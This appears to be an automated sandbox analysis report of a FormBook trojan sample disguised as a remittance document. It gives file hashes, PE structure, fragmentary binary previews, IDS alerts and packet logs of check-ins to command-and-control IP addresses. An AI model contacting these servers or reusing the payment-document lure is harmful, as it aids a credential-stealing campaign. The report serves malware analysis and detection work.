                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Sf..............0..x.............. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B.......................H........S...<......D......................................................}.....(.......(......{.....o.....*....0...........s#.....o.....*..0..F.........{....o....(....-..{....o.......+....,...{....o......+..r...p(....&.*...0..8.........u.......2o.....sH....s9......{....o....oF......o.....*r..{.....o......{.....o ....*....0............{.....o .....o!........,..rk..p.o!...o"...(#...(....&.+[..o$........,A..o$...t......{.....o<...o%.....{.....o>...o%.....{.....o&.....+.ry..p(.

                                          C:\Users\user\AppData\Roaming\GRogNEHvcL.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:false
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.964972138655388
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File size:694'272 bytes
                                          MD5:7bfc6728400d041f90f6dd5b3f67aa38
                                          SHA1:e3dfa3816a4b4fa3c4e7146953f1cc7debb84be8
                                          SHA256:92ef596e60597ec73400540ce819005b4d0ca33716ae9f0129547b119415e1d9
                                          SHA512:fa5d5b7882b72f2bb76cc7160689000d43c1011e14fbc4dcc469e42d95de29965b0b51f5c8149813c2ba10449063d1f161e62ad2ca33137dfd94fcc574bddef6
                                          SSDEEP:12288:QuzrYCFd6x0NOG61NSeL/wbnTzOELvg4vMtlLEMlaUrC3WPhp3LVZ0VXZGnNGa:N81x0NOG6TSsYbTfPmEMdeEhJpiVpGn/
                                          TLSH:0EE423803569DB61CA7723F94490995003F2DE05949EE24A1CD332FAA7B6F06EFB3647
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Sf..............0..x............... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:040917344b4fd9cd

                                          Static PE Info

                                          General

                                          Entrypoint:0x4a97e2
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6653FAD8 [Mon May 27 03:15:36 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa97900x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x1ad0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa77e80xa7800828a433706bd20c7d6ae345dda53e143False0.9680940998134329data7.971455070226271IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xaa0000x1ad00x1c0027fdbfa314a2828d76a70f6d4a55deecFalse0.8148716517857143data7.217468494819805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xac0000xc0x200a07d64a2a9977cc192c3ca52e6c31837False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xaa1000x144dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9694054262074273
                                          RT_GROUP_ICON0xab5600x14data1.05
                                          RT_VERSION0xab5840x34cdata0.42298578199052134
                                          RT_MANIFEST0xab8e00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          05/27/24-12:43:42.301762TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972780192.168.2.531.31.196.16
                                          05/27/24-12:44:39.831891TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.53.125.172.46
                                          05/27/24-12:42:49.943654TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971480192.168.2.5199.59.243.225
                                          05/27/24-12:44:53.365787TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974780192.168.2.5199.59.243.225
                                          05/27/24-12:44:11.323120TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973580192.168.2.578.142.211.199
                                          05/27/24-12:44:24.871394TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.566.29.149.46
                                          05/27/24-12:45:49.969014TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976380192.168.2.53.33.130.190
                                          05/27/24-12:43:29.047327TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972380192.168.2.5216.40.34.41
                                          05/27/24-12:46:03.256364TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976780192.168.2.551.195.44.77
                                          05/27/24-12:45:07.664711TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975180192.168.2.5199.59.243.225
                                          05/27/24-12:43:13.994642TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971980192.168.2.5103.138.88.50
                                          05/27/24-12:45:21.505394TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975580192.168.2.5173.254.28.213
                                          05/27/24-12:43:57.157571TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973180192.168.2.5183.181.79.111
                                          05/27/24-12:45:36.194501TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975980192.168.2.565.181.132.158

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 27, 2024 12:42:49.936228037 CEST4971480192.168.2.5199.59.243.225
                                          May 27, 2024 12:42:49.941154957 CEST8049714199.59.243.225192.168.2.5
                                          May 27, 2024 12:42:49.941459894 CEST4971480192.168.2.5199.59.243.225
                                          May 27, 2024 12:42:49.943654060 CEST4971480192.168.2.5199.59.243.225
                                          May 27, 2024 12:42:49.948492050 CEST8049714199.59.243.225192.168.2.5
                                          May 27, 2024 12:42:50.409034967 CEST8049714199.59.243.225192.168.2.5
                                          May 27, 2024 12:42:50.409055948 CEST8049714199.59.243.225192.168.2.5
                                          May 27, 2024 12:42:50.409187078 CEST4971480192.168.2.5199.59.243.225
                                          May 27, 2024 12:42:50.409250021 CEST8049714199.59.243.225192.168.2.5
                                          May 27, 2024 12:42:50.409322977 CEST4971480192.168.2.5199.59.243.225
                                          May 27, 2024 12:42:50.412399054 CEST4971480192.168.2.5199.59.243.225
                                          May 27, 2024 12:42:50.417222977 CEST8049714199.59.243.225192.168.2.5
                                          May 27, 2024 12:43:06.339664936 CEST4971580192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:06.344959974 CEST8049715103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:06.345041990 CEST4971580192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:06.346940041 CEST4971580192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:06.351912022 CEST8049715103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:07.849358082 CEST4971580192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:07.855030060 CEST8049715103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:07.855325937 CEST4971580192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:08.867934942 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:08.872894049 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:08.875463009 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:08.877310038 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:08.882287979 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.352641106 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.352674961 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.352756977 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:10.352932930 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353024960 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353068113 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353071928 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:10.353292942 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353339911 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:10.353360891 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353434086 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353466034 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353472948 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353482008 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:10.353488922 CEST8049717103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:10.353511095 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:10.353532076 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:10.380664110 CEST4971780192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:11.401371956 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:11.406795025 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:11.408840895 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:11.408840895 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:11.419466019 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:11.419559956 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829499960 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829521894 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829531908 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829622030 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:12.829685926 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829701900 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829713106 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829736948 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829736948 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:12.829755068 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:12.829757929 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829771996 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829783916 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.829802036 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:12.829822063 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:12.830502033 CEST8049718103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:12.830554008 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:12.912997961 CEST4971880192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:13.987433910 CEST4971980192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:13.992579937 CEST8049719103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:13.992674112 CEST4971980192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:13.994642019 CEST4971980192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:14.008835077 CEST8049719103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:15.274095058 CEST8049719103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:15.274276972 CEST8049719103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:15.274487019 CEST4971980192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:16.153060913 CEST4971980192.168.2.5103.138.88.50
                                          May 27, 2024 12:43:16.158107042 CEST8049719103.138.88.50192.168.2.5
                                          May 27, 2024 12:43:21.449103117 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:21.454155922 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.454252005 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:21.455991030 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:21.460867882 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972661972 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972676039 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972688913 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972695112 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972704887 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972712994 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972752094 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972758055 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972770929 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972776890 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.972820997 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:21.972881079 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:21.980973959 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.989598036 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.989603043 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:21.989686012 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:22.061153889 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:22.061168909 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:22.061184883 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:22.061191082 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:22.061197042 CEST8049720216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:22.061408043 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:22.958862066 CEST4972080192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:23.977139950 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:23.984025002 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:23.984119892 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:23.986085892 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:23.991096973 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487472057 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487493038 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487519026 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487529039 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487606049 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487627029 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487643957 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.487665892 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487689972 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487698078 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.487713099 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487723112 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.487735033 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.487776995 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.492821932 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.492829084 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.492903948 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.511379004 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.511941910 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.512017012 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.574453115 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.574467897 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.574496031 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.574506998 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.574515104 CEST8049721216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:24.574559927 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:24.574580908 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:25.490014076 CEST4972180192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:26.508312941 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:26.513485909 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:26.513658047 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:26.515472889 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:26.520463943 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:26.520622969 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029170990 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029202938 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029211044 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029227018 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029246092 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029261112 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029280901 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.029295921 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029311895 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029324055 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.029336929 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029347897 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.029366016 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.029400110 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.037026882 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.037836075 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.037895918 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.037911892 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.083652020 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.105564117 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.105581045 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.105607033 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.105622053 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.105638981 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.105679989 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.105747938 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:27.106015921 CEST8049722216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:27.106070995 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:28.021235943 CEST4972280192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.039669991 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.045438051 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.045537949 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.047327042 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.052248001 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528601885 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528655052 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528692007 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528727055 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528760910 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528796911 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528825045 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.528850079 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.528878927 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:29.528898954 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.528934956 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.533193111 CEST4972380192.168.2.5216.40.34.41
                                          May 27, 2024 12:43:29.539263964 CEST8049723216.40.34.41192.168.2.5
                                          May 27, 2024 12:43:34.694406986 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:34.699493885 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:34.699659109 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:34.702189922 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:34.707901955 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410310984 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410362959 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410408974 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410444021 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410517931 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.410526037 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410518885 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.410573006 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410609007 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410619974 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.410644054 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410681009 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410690069 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.410737038 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.410784006 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.416130066 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.416167021 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.416204929 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.416260004 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.458705902 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.532438993 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.532524109 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.532582045 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.532599926 CEST4972480192.168.2.531.31.196.16
                                          May 27, 2024 12:43:35.532618046 CEST804972431.31.196.16192.168.2.5
                                          May 27, 2024 12:43:35.532655001 CEST804972431.31.196.16192.168.2.5
